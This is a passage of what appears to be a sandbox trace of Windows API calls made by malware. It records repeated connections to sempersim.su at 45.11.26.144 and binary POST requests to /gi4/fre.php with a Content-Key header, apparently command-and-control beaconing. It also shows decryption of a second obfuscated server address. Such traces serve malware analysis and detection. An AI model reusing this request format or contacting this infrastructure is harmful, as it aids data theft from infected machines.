(lpLibFileName="shlwapi") returned 0x76d00000 [0301.315] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0301.316] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0301.316] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0301.316] GetProcessHeap () returned 0x5b0000 [0301.316] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0301.316] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdfc0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2d8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0301.318] GetProcessHeap () returned 0x5b0000 [0301.318] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca9b0 [0301.318] socket (af=2, type=1, protocol=6) returned 0x418 [0301.318] connect (s=0x418, name=0x5cf2d8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0301.387] FreeAddrInfoW (pAddrInfo=0x5cdfc0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2d8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0301.387] GetProcessHeap () returned 0x5b0000 [0301.389] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5cc8 [0301.389] GetProcessHeap () returned 0x5b0000 [0301.389] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0301.390] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0301.391] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0301.391] GetProcessHeap () returned 0x5b0000 [0301.391] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0301.391] GetProcessHeap () returned 0x5b0000 [0301.392] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0301.392] GetProcessHeap () returned 0x5b0000 [0301.392] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d32c0 [0301.392] GetProcessHeap () returned 0x5b0000 [0301.392] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0301.392] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0301.393] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0301.393] GetProcessHeap () returned 0x5b0000 [0301.393] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0301.393] GetProcessHeap () returned 0x5b0000 [0301.394] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0301.394] send (s=0x418, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0301.394] send (s=0x418, buf=0x5d1e18*, len=159, flags=0) returned 159 [0301.394] GetProcessHeap () returned 0x5b0000 [0301.395] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0301.395] recv (in: s=0x418, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0302.651] GetProcessHeap () returned 0x5b0000 [0302.652] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0302.652] GetProcessHeap () returned 0x5b0000 [0302.652] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d32c0 | out: hHeap=0x5b0000) returned 1 [0302.652] GetProcessHeap () returned 0x5b0000 [0302.653] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0302.653] GetProcessHeap () returned 0x5b0000 [0302.653] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5cc8 | out: hHeap=0x5b0000) returned 1 [0302.653] closesocket (s=0x418) returned 0 [0302.654] GetProcessHeap () returned 0x5b0000 [0302.654] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca9b0 | out: hHeap=0x5b0000) returned 1 [0302.654] GetProcessHeap () returned 0x5b0000 [0302.654] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5f88 | out: hHeap=0x5b0000) returned 1 [0302.654] GetProcessHeap () returned 0x5b0000 [0302.655] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3308 | out: hHeap=0x5b0000) returned 1 [0302.655] GetProcessHeap () returned 0x5b0000 [0302.655] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0302.665] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xce8) returned 0x418 [0302.670] Sleep (dwMilliseconds=0xea60) [0302.690] GetProcessHeap () returned 0x5b0000 [0302.690] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2e40 [0302.690] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0302.691] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0302.697] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0302.697] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0302.707] GetProcessHeap () returned 0x5b0000 [0302.707] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0302.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0302.708] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0302.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0302.709] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0302.710] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0302.710] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0302.710] GetProcessHeap () returned 0x5b0000 [0302.710] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0302.711] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0302.711] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2e40, pdwDataLen=0xdfcfc | out: pbData=0x5d2e40, pdwDataLen=0xdfcfc) returned 1 [0302.712] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0302.712] CryptDestroyKey (hKey=0x5be048) returned 1 [0302.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0302.713] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0302.713] GetProcessHeap () returned 0x5b0000 [0302.713] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5910 [0302.714] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0302.714] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0302.714] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0302.715] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0302.715] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0302.715] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0302.716] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0302.716] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0302.716] GetProcessHeap () returned 0x5b0000 [0302.716] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0302.716] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0302.717] GetProcessHeap () returned 0x5b0000 [0302.717] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0302.717] GetProcessHeap () returned 0x5b0000 [0302.717] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5910 | out: hHeap=0x5b0000) returned 1 [0302.717] GetProcessHeap () returned 0x5b0000 [0302.718] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0302.718] GetProcessHeap () returned 0x5b0000 [0302.718] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d35d8 [0302.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0302.721] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0302.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0302.727] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0302.736] GetProcessHeap () returned 0x5b0000 [0302.736] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0302.737] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0302.737] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0302.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0302.739] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0302.739] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0302.740] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0302.740] GetProcessHeap () returned 0x5b0000 [0302.740] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0302.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0302.741] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d35d8, pdwDataLen=0xdfcfc | out: pbData=0x5d35d8, pdwDataLen=0xdfcfc) returned 1 [0302.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0302.742] CryptDestroyKey (hKey=0x5bde08) returned 1 [0302.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0302.743] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0302.743] GetProcessHeap () returned 0x5b0000 [0302.743] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d54c0 [0302.744] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0302.744] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0302.745] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0302.745] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0302.746] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0302.746] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0302.746] GetProcessHeap () returned 0x5b0000 [0302.746] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0302.746] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdb38*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf338*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0302.750] GetProcessHeap () returned 0x5b0000 [0302.750] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca9f0 [0302.750] socket (af=2, type=1, protocol=6) returned 0x41c [0302.750] connect (s=0x41c, name=0x5cf338*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0302.822] FreeAddrInfoW (pAddrInfo=0x5cdb38*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf338*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0302.822] GetProcessHeap () returned 0x5b0000 [0302.822] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5998 [0302.822] GetProcessHeap () returned 0x5b0000 [0302.822] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0302.823] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0302.835] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0302.835] GetProcessHeap () returned 0x5b0000 [0302.835] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0302.835] GetProcessHeap () returned 0x5b0000 [0302.835] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0302.835] GetProcessHeap () returned 0x5b0000 [0302.835] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3038 [0302.835] GetProcessHeap () returned 0x5b0000 [0302.835] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0302.836] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0302.836] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0302.837] GetProcessHeap () returned 0x5b0000 [0302.837] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0302.837] GetProcessHeap () returned 0x5b0000 [0302.837] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0302.837] send (s=0x41c, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0302.838] send (s=0x41c, buf=0x5d1e18*, len=159, flags=0) returned 159 [0302.838] GetProcessHeap () returned 0x5b0000 [0302.838] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0302.838] recv (in: s=0x41c, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0304.055] GetProcessHeap () returned 0x5b0000 [0304.055] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0304.055] GetProcessHeap () returned 0x5b0000 [0304.056] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3038 | out: hHeap=0x5b0000) returned 1 [0304.056] GetProcessHeap () returned 0x5b0000 [0304.056] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0304.056] GetProcessHeap () returned 0x5b0000 [0304.057] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5998 | out: hHeap=0x5b0000) returned 1 [0304.057] closesocket (s=0x41c) returned 0 [0304.078] GetProcessHeap () returned 0x5b0000 [0304.078] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca9f0 | out: hHeap=0x5b0000) returned 1 [0304.078] GetProcessHeap () returned 0x5b0000 [0304.079] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d54c0 | out: hHeap=0x5b0000) returned 1 [0304.079] GetProcessHeap () returned 0x5b0000 [0304.079] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d35d8 | out: hHeap=0x5b0000) returned 1 [0304.079] GetProcessHeap () returned 0x5b0000 [0304.079] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0304.079] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xcec) returned 0x41c [0304.081] Sleep (dwMilliseconds=0xea60) [0304.105] GetProcessHeap () returned 0x5b0000 [0304.105] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3398 [0304.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0304.108] CryptAcquireContextW (phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10) Thread: id = 7 os_tid = 0x109c Thread: id = 8 os_tid = 0xd64 [0128.085] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0128.086] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:19:11 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0128.086] GetProcessHeap () returned 0x5b0000 [0128.087] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf230 [0128.087] GetProcessHeap () returned 0x5b0000 [0128.087] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf230 | out: hHeap=0x5b0000) returned 1 [0128.087] GetProcessHeap () returned 0x5b0000 [0128.087] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 Thread: id = 9 os_tid = 0xd68 [0140.361] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0140.363] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:19:23 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0140.364] GetProcessHeap () returned 0x5b0000 [0140.364] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf230 [0140.364] GetProcessHeap () returned 0x5b0000 [0140.364] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf230 | out: hHeap=0x5b0000) returned 1 [0140.364] GetProcessHeap () returned 0x5b0000 [0140.364] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 Thread: id = 10 os_tid = 0x10d0 Thread: id = 11 os_tid = 0xd6c Thread: id = 12 os_tid = 0x18c [0152.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0152.447] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:19:36 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0152.447] GetProcessHeap () returned 0x5b0000 [0152.447] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0152.448] GetProcessHeap () returned 0x5b0000 [0152.448] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0152.448] GetProcessHeap () returned 0x5b0000 [0152.448] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cd170 | out: hHeap=0x5b0000) returned 1 Thread: id = 13 os_tid = 0x858 [0154.560] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0154.561] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:19:38 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0154.561] GetProcessHeap () returned 0x5b0000 [0154.561] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0154.561] GetProcessHeap () returned 0x5b0000 [0154.561] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0154.561] GetProcessHeap () returned 0x5b0000 [0154.562] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cd170 | out: hHeap=0x5b0000) returned 1 Thread: id = 14 os_tid = 0x630 [0156.530] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0156.640] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:19:40 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0156.640] GetProcessHeap () returned 0x5b0000 [0156.640] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0156.640] GetProcessHeap () returned 0x5b0000 [0156.640] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0156.640] GetProcessHeap () returned 0x5b0000 [0156.640] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cd268 | out: hHeap=0x5b0000) returned 1 Thread: id = 15 os_tid = 0x10c8 [0158.388] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0158.388] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:19:42 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0158.388] GetProcessHeap () returned 0x5b0000 [0158.388] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0158.388] GetProcessHeap () returned 0x5b0000 [0158.389] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0158.389] GetProcessHeap () returned 0x5b0000 [0158.389] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cda70 | out: hHeap=0x5b0000) returned 1 Thread: id = 16 os_tid = 0x10b8 [0160.363] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0160.364] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:19:44 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0160.364] GetProcessHeap () returned 0x5b0000 [0160.364] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0160.364] GetProcessHeap () returned 0x5b0000 [0160.364] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0160.364] GetProcessHeap () returned 0x5b0000 [0160.365] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cda70 | out: hHeap=0x5b0000) returned 1 Thread: id = 17 os_tid = 0x10c4 [0162.189] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0162.189] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:19:46 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0162.189] GetProcessHeap () returned 0x5b0000 [0162.189] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf338 [0162.189] GetProcessHeap () returned 0x5b0000 [0162.189] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf338 | out: hHeap=0x5b0000) returned 1 [0162.189] GetProcessHeap () returned 0x5b0000 [0162.190] HeapFree (in: hHeap=0x5b0000, 